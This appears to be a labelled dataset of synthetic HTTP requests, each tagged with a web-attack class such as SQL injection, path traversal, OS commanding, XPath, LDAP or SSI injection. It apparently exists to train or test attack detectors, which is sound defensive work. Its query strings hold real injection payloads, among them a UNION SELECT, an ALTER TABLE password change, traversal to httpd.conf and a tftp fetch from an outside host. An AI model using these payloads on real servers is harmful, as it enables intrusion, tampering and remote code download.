Expect: 100-continue
From: hD4h@iejie.gov
If-Modified-Since: Thu, 31 Mar 05 19:42:03 GMT
If-Unmodified-Since: Tue, 05 May 09 21:21:18 GMT
If-Match: *
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: *
Max-Forwards: 8500
MIME-Version: 4.9
Pragma: nheqsgo='lToex'
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: ndtao Rimn=edbt5bot
Range: 9183-933,-0
Referer: http://ut8u9.gov/mtwfptn/ineilea/heriq/29amR.cfm
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.7 (Windows; U; Win 9x 4.5; aA-ni; rv:3.1.9) Gecko/48308717
UA-CPU: x86
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: fnAhun/6.5 www.eh33mol.gif, HTTP/2.4 www.hI34iv.png, 0.2 171.144.220.41
Transfer-Encoding: compress
Upgrade: wlH4l/4.4
Warning: 460 71.20.89.165:7 "nhiets5etmlmtan" "Wed, 05 Dec 07 05:59:26 UTC"
X-Forwarded-For: 121.171.235.172
X-Serial-Number: 48112496441051
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47501
Start - Id: 39036
class: LdapInjection
PUT /8x4sy@netcat07P/gtya.html? HTTP/1.0
Content-Length: 140
Content-Language: ov
Content-Encoding: gzip
Content-Location: http://www.haosdns.st/zc6tiof/nEihqc9/utt5d.php3
Content-MD5: cmJwVHNhczVzbG1tYTdlbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jun 07 24:01:58 GMT
Last-Modified: Mon, 11 Apr 05 03:09:16 CET
Host: 22.100.97.125
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.4, x-mac-cyrillic;q=0.5, iso-8859-4, hz-gb-2312, iso-8859-7
Accept-Encoding: ")(targetfilter=(o=NetscapeRoot))
Accept-Language: *;q=0.6
Cache-Control: teshdt='a'
Client-ip: 102.128.132.6
Cookie: seyi=hRer0;yrownnzwat2=4414;vbNoaizdaT=Pe1d
Cookie2: $Version="82"
Date: Sun, 29 Feb 04 19:33:43 UTC
ETag: W/"OvKjBTi1p8IAb@5"
Expect: hhieooaz=SersmcE;itinb
From: 0sueeoe@ntaueoIhu.biz
If-Modified-Since: Wed, 15 Jul 09 06:17:50 CET
If-Unmodified-Since: Tue, 15 Aug 06 17:44:49 CET
If-Match: "ZcK713gH_BsftSC"
If-None-Match: "-G7ddr_CSaCjw0_UEX"
If-Range: "LsueI_j9GlQVWwiKU8"
Max-Forwards: 4
MIME-Version: 9.1
Pragma: oy9af='rpnA'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic UGRlcU9pOjh0ZWFjbHM=
Range: -0298
Referer: http://ghetdhrh.ch/3jq3kcn4/jsny/uc7pSe.css
TE: chunked
Trailer: Trailer
User-Agent: h@hKos http://www.eynt.com
UA-CPU: StrongARM
UA-Disp: 3130,924,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 699x217
Via: 2.6 www.ewhayLcs.tiff, 5.1 25.180.130.202
Transfer-Encoding: identity
Upgrade: ne66ft/5.8, ziI/5.3, ofii/1.2
Warning: 658 www.5nnyaqt.jpg:82110 "coUeCYctEacH" "Wed, 16 Jun 04 09:17:55 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

p6Lz3CIcffwgetV=6ntzabonvzahn&Dicpnr6f=@a7em|ow&aDa8ioihwnhtevb=RStvninntgiee&rriithu= &phpbkXe=5&ddewiHjncme=ecorh&Aono=egErtnh1i4oi8ed

End - Id: 39036
Start - Id: 45598
class: PathTransversal
GET /tD8HFEL804EfVpS/ignehePlits/gbN4ju/ePFaeV0XJNIobyc.js?oarCt=546313&dadn4lcby=1n+&RhtaccesGwLyxH@PZE=52238&2lEo-FsGB21=cda&nidznahebr=rcMxm%40wWfd&qms=..%2F..%2F..%2FWINNT%2Fautoexec.bat&isOw=Nnydtih&Ub7=xi+ts HTTP/1.1
Host: www.2gai.org
Connection: ao9aa
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: ziisaa-vnoh, mezbyou2-teo
Cache-Control: max-stale=4614
Client-ip: 180.31.167.180
Cookie: oolx=ttorMxml ;aessbisoh4n=k
Cookie2: $Version="7"
Date: Mon, 20 Oct 08 10:14:05 GMT
ETag: W/"A4SSBwZMlSj3m58HF"
Expect: iVjhs
From: f4re3ea2@HiNl.uk
If-Modified-Since: Thu, 06 Sep 07 10:19:29 UTC
If-Unmodified-Since: Tue, 22 Mar 05 23:53:45 CET
If-Match: *
If-None-Match: *
If-Range: "Mmyq6Sbv1F@FhSuoXr"
Max-Forwards: 7
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest cnonce="e4hha"
Range: -709
Referer: http://nozrnt.fr/wtha2e/nntede0l.exe
TE: gzip;q=0.9,trailers,gzip
Trailer: Accept
User-Agent: kroeaeiyie
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4708x895
Via: eiRhsy/4.5 www.pfttsf.html
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 204.138.194.99
X-Serial-Number: 079212958544590509
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45598
Start - Id: 35323
class: SqlInjection
GET /iyeeure/iHry1systema9KA2U4l/3QK8perlJj.html?GgpositionPgT_1jy0dE=%27%29+UNION+ALL+SELECT+6416+FROM++++ijhIadL++++WHERE+%28%27%27+%3D++%27&tl=cgt_cK7&.PAYtreplacebodyhQs=%3Ajlrsamiw%5B&esibe=leOhylcpagsr0mie6+a&sh7tsftHeDyag=iR&sw2gomyS26mm5=aoBKO&deolmiece=wtpFyetwddabr8 HTTP/1.1
Host: 240.22.65.55
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.7, iso-8859-4, iso-2022-kr
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 89.110.200.190
Cookie: 7replace8D3N=o+g@lbgsound';glXxih=eDDwJ;te=aNAyCrIdxDI
Cookie2: $Version="54"
Date: Fri, 01 Sep 06 17:06:11 UTC
ETag: W/"7SbYCByy40597oifpLn"
Expect: 100-continue
From: ntpn@oIrer.it
If-Modified-Since: Tue, 27 Jun 06 12:32:58 CET
If-Unmodified-Since: Mon, 08 Dec 08 19:59:25 GMT
If-Match: *
If-None-Match: "oI3z9pxdslHC95lMq"
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 29
MIME-Version: 4.0
Pragma: e=e
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: Digest opaque="5qux6y"
Range: -699332,-7572
Referer: /lexOntty.tar.gz
TE: trailers
Trailer: If-Range
User-Agent: orf1oNrhditnpn1ap
UA-CPU: 68000
UA-Disp: 703,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5578x419
Via: 0.8 www.4lhAim.tiff, HTTP/8.0 www.aotgt.shtml, HTTP/4.2 www.moei.js
Transfer-Encoding: deaz
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 246484
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35323
Start - Id: 42512
class: SqlInjection
GET /cp/nq1/autoexecKjWz7DKHJ4shutdownID/Fnd/SJ-.YbgsoundM/cs7qNP/by-SQiEoK66V4Cu.gif?F6OA9Nthttps3=5n_i9kl&sisdglye0=7867820&ktK8mwgetRxO=cKm&hn6lieformnsIt=tt-Dht6ak&etJseh0hhdugsut=rewoacechotd&Tst=4&ele=OR++%27faaaNlrh%27++++LIKE+++++%27Sim%25%27&uy7aot=fiy%40 HTTP/1.1
Host: 209.173.172.165
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=2
Client-ip: 17.1.105.246
Cookie: Bexohg=ft3ttwgp7%;dnwlxqcNBo=tuustdinanee 4Atai ]oa;issnaeSma4oxuo=lyoqoet0xsev
Cookie2: $Version="9"
Date: Wed, 20 Sep 06 19:09:45 GMT
ETag: "Fhdp4@cKxDHrUkZvfQ"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Mon, 15 Dec 08 04:40:03 UTC
If-Unmodified-Since: Sun, 02 Sep 07 04:25:35 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 24 Feb 04 01:49:49 UTC
Max-Forwards: 509
MIME-Version: 6.8
Pragma: doiibNn='irtsd'
Proxy-Authorization: Basic d2xpbjplbmsxaHk2bQ==
Authorization: NTLM YTRkZXk0bGVFanJ0RWhxbFRucmVxbGRnZHNpdGVlZWVka2ltb3RpOG5vZHVwdDg=
Range: 7043-5,-70
Referer: /QuUxbeSn/Elcih0mt.exe
TE: trailers,gzip;q=0.4,deflate
Trailer: Max-Forwards
User-Agent: eQo90j5 http://www.s7ov4haw.net
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 5.6 65.222.130.51, 4.1 www.Rbsg.png
Transfer-Encoding: deflate
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 860 252.84.118.119 "gymdt4aeaea4ehhX" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42512
Start - Id: 45501
class: PathTransversal
GET /e8wonucyTieyodnl/laqsk/i2Rp45bPh695S38/y7cdoiRl/h6bXZMSOVXi/tsnaeqamaae.jpeg?g8a=eae7Utsc&I5uHiT4o2@=iesRasacceptst&ets=eBR&kezItovssayti=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&teyedhtl=tkrbhe&aeyJnyss1=5788895&epnsylwPI58dd=ns4or&Aal=03&tiaitn1u7nsg=oksinreooii%3Fmas&tsocaoL4gr=202&thumhNEOSd=DdDenhdtitd HTTP/1.0
Host: 25.103.182.223:91
Connection: kqn8ehnO
Accept: text/*, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=69
Client-ip: 165.251.254.128
Cookie: ts3em8isieacyrh=cn1twM;pk=htotT1e2+Di0xmludixh;d0usstoetOr=F/P><loehtftnaa5o%
Cookie2: $Version="629"
Date: Sat, 06 Mar 04 11:33:07 UTC
ETag: W/"WNHs.jea5NTXT5QD"
Expect: 100-continue
From: resr4o@b7ostR1pai.cz
If-Modified-Since: Tue, 20 Apr 10 11:41:52 CET
If-Unmodified-Since: Sun, 01 May 05 03:29:42 CET
If-Match: *
If-None-Match: "3X65fxKnxeYPp5ve5JV"
If-Range: Thu, 04 Mar 04 09:36:04 GMT
Max-Forwards: 1
MIME-Version: 4.8
Pragma: iieodQo='wgtedbsh'
Proxy-Authorization: Digest algorithm=noaen
Authorization: 0sdfe untLe=iocYnPo
Range: 354-,63882-
Referer: http://tsqoy.st/5esr.doc
TE: trailers,gzip
Trailer: Upgrade
User-Agent: fneyydc (lOjJuy8; rTiQII; tOTjjjG6K; lYB_0Ts)
UA-CPU: MIPS
UA-Disp: 3246,785,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: 8.0 9.172.27.77, HTTP/8.6 www.hhlqse.png, 9ti/3.8 54.63.61.109
Transfer-Encoding: gzip
Upgrade: paa/8.6, yprO/1.1
Warning: 882 118.217.63.222 "etpoiZeexEopAili8v" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45501
Start - Id: 42557
class: SqlInjection
GET /_b.3h4wEi6o-1L/n38dedcyr2zstflpe/smKP.5.png?mur=ag&Bafnehp5=3doai&eeobty=Hmeds&tzincs6=%3Balter++table+ontage+set+++++password++++%3D++++%27otshg%27+where+++name+++++%3D+++%27tsshen%27%3B&n2l8=49733987 HTTP/1.1
Host: www.crll3Ee.uk
Connection: issnex
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=1
Client-ip: 29.213.12.81
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="462"
Date: Wed, 22 Jun 05 06:59:46 UTC
ETag: "-875U-fCp82HcNL"
Expect: 100-continue
From: aeaaa@xlGenlm.fr
If-Modified-Since: Thu, 16 Apr 09 09:42:07 UTC
If-Unmodified-Since: Fri, 24 Dec 04 18:24:18 CET
If-Match: "MU_MYS__Qa3ZXWnG"
If-None-Match: "Va.ZZI20HADiMvVACR"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 5182
MIME-Version: 8.8
Pragma: ii='6EaE'
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM ZmVvdXRqOXJldGhDeDBpdDJvY25zaWZ0Yml3cnR0bEk=
Range: -9299
Referer: /ihstmngO.asmx
TE: gzip
Trailer: Expect
User-Agent: Mozilla/0.5 (compatible; tmrej; Unix; ty9rmlbq5; tUpaIs)
UA-CPU: 68000
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: 3.3 62.32.90.167, 3.2 252.83.1.73
Transfer-Encoding: compress
Upgrade: oui/8.3, tn8/9.7
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42557
Start - Id: 44131
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: 224.163.135.253
Connection: cEfor
Accept: */*;q=0.1
Accept-Charset: x-mac-japanese;q=0.3, cp-932;q=0.2, cp-950
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 139.133.159.204
Cookie: not=5;sdogvF=as;soasln=018;7tws6tqGrif=eqH mtei/processing-instructionys
Cookie2: $Version="549"
Date: Tue, 04 May 04 03:28:12 CET
ETag: "G3tMuf5X5f@OyB7Fh"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 05 May 10 19:43:07 GMT
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: "xEdsO.stebgVRvGq."
If-None-Match: *
If-Range: "K1LqRt.C3aG.OYscEtx"
Max-Forwards: 750
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: 14nnle i0nornu3=tmoIce
Range: 2856-325921,765830-7785,3752-597
Referer: /iige/eoeu.png
TE: trailers
Trailer: Upgrade
User-Agent: tP4gP5EsLj http://www.tlauA.ch
UA-CPU: 68000
UA-Disp: 0410,9029,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/0.0 www.t2actsl.png, 1.6 www.etndo.gif, 5.6 187.24.170.221
Transfer-Encoding: deflate
Upgrade: bletts/8.4, eawgt/6.8, sXn/8.3, sei0e/5.7
Warning: 051 11.28.159.211 "vuojxaosel7oelrcfSe" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44131
Start - Id: 35694
class: XPathInjection
GET /nniscssadtrcee/Jcu/q3bp0hhttp/0cteNoer1aaeosn/oaeoplD/hMTsmS.sh?bpra7tnAt7Fxwd=v&iinhEctHia0=ePHd&Ucetnnl9iYrW=numktR9Zdocetceeao&RXiehtdg95n7iat=Eiframen%7EeGeth&odnhtko=rh+rlure%3Dteeetoco&iSs0gloueve=41++++or++++r%2Ftop%2FzdSsh%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D5%5D+++or+++++6%3D HTTP/1.0
Host: 39.45.174.28
Connection: ijmt
Accept: */*;q=0.0
Accept-Charset: iso-8859-2;q=0.6, isiri-3342, shift_jis, cp-936;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: on-7g6si, u-osza;q=0.6
Cache-Control: min-fresh=4
Client-ip: 50.131.48.51
Cookie: goprlu=nnsnwi9wosce;alys=eolauvE6ftby
Cookie2: $Version="0"
Date: Tue, 17 Oct 06 10:03:28 UTC
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: fbtsncr
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Fri, 06 Feb 09 22:26:13 UTC
If-Unmodified-Since: Wed, 27 Jun 07 11:43:23 GMT
If-Match: *
If-None-Match: "mm6dNQHYasjuP@O7k"
If-Range: *
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: Basic aWJVZnRpOmVmaEU=
Range: 5225-,8-9,1-
Referer: /anhma/5apte/7Hieaeea/ssoeees/twi8erl.pl
TE: trailers
Trailer: If-Range
User-Agent: tinp (r3sfzWDsh; ehQ91xT; dn7FbT)
UA-CPU: PowerPC
UA-Disp: 9150,2216,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: FTP/3.8 176.165.200.193
Transfer-Encoding: gzip
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 211.136.86.197
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35694
Start - Id: 39350
class: SSI
GET /tinaari1s1hienfvve/zm-E/tlrlueoH/2aca1iooko4oiw/e0AprcpoexecstdineUm/mailusr5hqQB/az28tHr/nxN.css?5i3Ka=poal&s5dsoeat=eNnfE5nqehINy&daz=%26eonaiz8l+m7ad%3E&KH4phpeunionf=fg4CuvrTa.D-&F1pKSHsa6d=otrVenjhdservices&axfmnyelmcmw=48586&Aew1pilDpq=129342&das=9704294&5HK17ormlJ2cs=nib%29yscriptFe&38ia5herota=tsrt7vemst&ddfaazzpaetd=%3C%21--%23email+fromhost%3D%22www.oesetaA6.com%22+tohost%3D%22mailbox.tgIr.com%22+message%3D%22fynath+uoeeice+sS67in+ranO%22+fromaddress%3D%22brsw0e.com%22+toaddress%3D%22d6i.eet.com%22+subject%3D%22st%22+sender%3D%22oshs.com%22+replyto%3D%22t4Ut8ee.com%22+cc%3D%22RhnS%22+inreplyto%3D%22rsasa+or7+wh3%22+id%3D%22aDmail%22+--%3E&ztl=1335&a6u9ienrrmeo=293829&Osha=wdTFhgdGQjC HTTP/1.1
Host: www.aowseli.be
Connection: z8sane
Accept: application/zip;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: GnrahtlO-khh5ee;q=0.7, c1etih-8e, l57eelm-don, senaNn-gp;q=0.7, Dnn-nS;q=0.6
Cache-Control: only-if-cached
Client-ip: 166.96.81.21
Cookie: mO5p90RrIM=enGNbM4@v;ciuqnbetinohN=hrselectinA;rBCeoexj=nfbTTqbeerAtudo;t4cT=dsoo3anrete;9CXZechoTMUH6J=89miwSbtv;862mshs6esns=ewfanetcatr
Cookie2: $Version="50"
Date: Sun, 09 Nov 08 12:56:14 GMT
ETag: W/"2pmeGZhNRIpjk2SWKzJ"
Expect: 1eaet=xvho;paeeore=ucea
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 13 Oct 08 21:43:56 CET
If-Unmodified-Since: Wed, 17 Jun 09 05:54:33 UTC
If-Match: "-aUfKaKEi7JU9073kL."
If-None-Match: *
If-Range: *
Max-Forwards: 964
MIME-Version: 9.5
Pragma: nn=tmaee
Proxy-Authorization: Basic MkVhaTU6ZTJuVHRo
Authorization: Digest qop=auth-int
Range: 1-35,9436-,-246816
Referer: http://www.eaRqr.fr/anen/oaax59ir/nhtfurte.swf
TE: deflate;q=0.7,deflate;q=0.3
Trailer: Host
User-Agent: bEdbnvn (iKl.qtq.; oWtPhc.NQ; faC9V1JPF; mgP23Di)
UA-CPU: 68000
UA-Disp: 9327,7903,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5277x2991
Via: gfpEe/5.9 www.2pia3ra.jpeg, OoPUYa/3.6 213.183.54.18:8
Transfer-Encoding: deflate
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 198.159.65.26
X-Serial-Number: 802337450581
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39350
Start - Id: 38302
class: LdapInjection
GET /wps9stgae8oiqi/n@1IzlIZCYU/65I4Ua/yatTY8LtbE-fkox/aaesQweeoqpcp2scehfn/mY0F.nsf?yue3ssmp=366229&1eaIec9=cP%27%25uu&EjZdeleteN=ahEhcatiA0&n6moclbo=8&_T3HPDq1bgsound@=100522&Pnturussu9s=1382&eciz0akunNOve=dht0kdaO5n6&fnbK=fbeoqwEe&areAtfwlac5o=rnneue&Fgroup byHImCF6M=aa&Klnph-QechoAYcmdRPAnode=7&utrtE=node9&aeno2swertSuz=%29++++%28%7C%28td%3Dtlo*%29&jtgLnqE1te=4290014 HTTP/1.0
Host: www.grmdaubtc.be
Connection: close
Accept: image/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 125.61.79.193
Cookie: exhess=htpass>@hsaoi5 a;eistiga0g=8;hrxtyez=s >ItssystemSa2p7wrotn;inl5nea=f;tni=66jeb
Cookie2: $Version="991"
Date: Sun, 25 Feb 07 03:16:59 UTC
ETag: W/"-ggdckprLkOtw2iG"
Expect: 100-continue
From: ctbt@euirsarao.st
If-Modified-Since: Fri, 06 Apr 07 18:57:01 GMT
If-Unmodified-Since: Wed, 19 Dec 07 24:13:49 CET
If-Match: "94xpD0OBuJroLHO"
If-None-Match: "Ra@JdgoEtz25OJQsnSR"
If-Range: "NbfNS-Q36.5oMT.U"
Max-Forwards: 3824
MIME-Version: 3.2
Pragma: h='Cl56iHr'
Proxy-Authorization: Digest username="xipatefi"
Authorization: NTLM ZFI1OGU0bkVuYXNzVElnMlNhcklMdVppc3BsYTRubmh0cW5yNQ==
Range: -85142,6347-069984
Referer: /oyHNx/optae/noEbet/hsev.pl
TE: deflate,gzip;q=0.0,gzip
Trailer: From
User-Agent: eD1Fi8 http://www.etsess.st
UA-CPU: 68000
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: 4.6 www.Etli.tiff, 3.5 www.adtettaf.css:6
Transfer-Encoding: gzip
Upgrade: segoo/3.8
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38302
Start - Id: 46382
class: PathTransversal
GET /35MW/Nthioasx9eU/iRSd5Q4XpRBgu0D-EQm/n3lrtaZolwertka/mO/s9kGTj/a2toauhv/nX4Xb.ZQb/talTaatycte8rjFz/s9qr50@YJAxKT@.dll?kM5s=0-Binnii+cO+y&8infen286Eo6Gps=%2Fetc%2Fhttpd%2Fhttpd.conf&xNenxu6ue1=5Vl.F&DenYe=5h8Zkri9Um HTTP/1.1
Host: www.Dy3aieaimT.gov:80
Connection: close
Accept: image/*;q=0.3, image/gif;q=0.0
Accept-Charset: x-mac-greek;q=0.0, x-mac-arabic;q=0.2, x-mac-korean;q=0.1, windows-1251;q=0.9
Accept-Encoding: 
Accept-Language: bveej1a-rsW;q=0.0, rour-9lhfur;q=0.2, soiEtS3-iIa;q=0.2
Cache-Control: min-fresh=36
Client-ip: 31.37.78.78
Cookie: Hsomh6btjsutS=f3B;tl5spfhalhenase=4window.openEa;nrzn=etalhrqlrmtm;as_pOYB6vincludeM=uk5PwE6NjrR;egegoenn=0ddoqrsf;X8lchildfounionJj=childnp
Cookie2: $Version="1"
Date: Tue, 06 Oct 09 02:25:00 GMT
ETag: "GFsg.faK@trgN@CsoV"
Expect: 100-continue
From: cewts@1fgr.fr
If-Modified-Since: Tue, 23 Feb 10 05:19:06 CET
If-Unmodified-Since: Wed, 21 Nov 07 06:53:53 GMT
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: *
If-Range: *
Max-Forwards: 8922
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: hdes nflr9u=Tyswralt
Authorization: NTLM b3N2Y21yaFM3bnlsZmZzbGVpWU50aWVlaHJ1b2gwMWVJYTA=
Range: 2-1818,846125-
Referer: http://www.rjazbsi.net/a4ca/tOtksc0/thap/asoSsrl.mpeg
TE: deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/3.0 (Machintosh; U; PPC 3.4; 2t-9h; rv:4.2.6) Gecko/48752738
UA-CPU: MIPS
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: eilril/6.8 www.ishmNzuj.html:1143
Transfer-Encoding: identity
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46382
Start - Id: 43140
class: OsCommanding
GET /er6W6IBhS7hx/i709noQvqAWxIS-PA/1sU4GA/heaInk7iuiesitttbwi0/cq_nMqzpzvHle/tov/tmumFVEoWDwmEEfXNp3F/MXOU7d/tdoAano.aspx?a3otpie=u019Ul&Tdwnofhumro=Yen&2upRxrtnc1Ee=171705&uIauIaarw2bao=b%29havingslxs%28a+n&3r1yrteltme1c=io4s&N5-jVV3=%2B%7Cc&9lR7ctnmee1=%27+++%3B+++++tftp++++-c+++++get++www.reli.com%3A%2Fngitisel.tar&cegnsr4lhd=7 HTTP/1.1
Host: www.tbrnAimwa.it:1129
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.8
Accept-Language: *;q=0.9
Cache-Control: max-age=89205
Client-ip: 203.26.22.181
Cookie: mnnHro7=1;seetagllS=iUSZn;soveim=usNi;npyubfl8n=BEpoo5o4adt
Cookie2: $Version="11"
Date: Sun, 22 Jul 07 02:29:27 UTC
ETag: W/"1Bt5VxNgPIaefYNngm27"
Expect: riuusi2e=neiyivtb
From: ndud@rzo8frE.cz
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Sun, 20 Jun 04 05:58:13 UTC
If-Match: "J2aanYcaIyVZ7g5W"
If-None-Match: "Rlk92eN57i9yb_UtBo9c"
If-Range: "bhXDUrHYIRYupywyj"
Max-Forwards: 42
MIME-Version: 2.9
Pragma: g='Uia'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: Digest realm
Range: 46359-,93372-15,76-
Referer: http://snrd.cz/mhV20m4/eHmhudif/bhrbn/3hts/eectE.zip
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: m8euz4/7.7.5.8.8
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 699x046
Via: 1.1 56.9.48.90, 4.6 204.158.16.123
Transfer-Encoding: identity
Upgrade: irotn/6.8
Warning: 904 www.jerlys.js "mltO" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43140
Start - Id: 41255
class: SqlInjection
GET /@SOBB8WWL/mqSeAEU76g4nLQkcqs1/jtay4uu4osrar53hha/s0aEddus/tD9fsZxA2.N.K_Z2/pO1q0ezqoKkL-7g8a/nnAesrrDtinn1pa/dOsAntopiD7abtEsh/lHxoElmyjcmQmnohrv/UlibcITbody/cac.tiff?gg2en7hne1a6=etgt&odebrrreniSAsn=gobjectcorVo4e8&ry=6&fa4nagaemooE=mnhsr&seeayDRar7F9dy=956&nopilrRtrusasf=27o4%3AtdwlYe-%7Ca&kneatstnC2g=wHsu03&tro=ajscmoe9m8ea&-EC6c05HcH=usta&@UzYxV7Q-p=eo%252G&ouaoeeiiahasnt=77&ertnsoas=5&tignife=geM0tnlAetdio&tiefeaRsRo=apxSvAL%407WZj HTTP/1.1
Host: 189.244.86.66
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: OR     'e9sLe2pTa'     IN    ('')
Accept-Language: *
Cache-Control: max-age=9
Cookie: ti7d6=3;es=765132;tn=310100217;Id2niotesSnhh=hcaot8n;JpSg=saesy-ycolsr
Date: Mon, 17 Jan 05 24:34:41 GMT
If-Modified-Since: Thu, 08 Jul 04 05:59:48 GMT
If-Unmodified-Since: Tue, 22 Jan 08 14:36:44 UTC
If-Match: *
If-None-Match: *
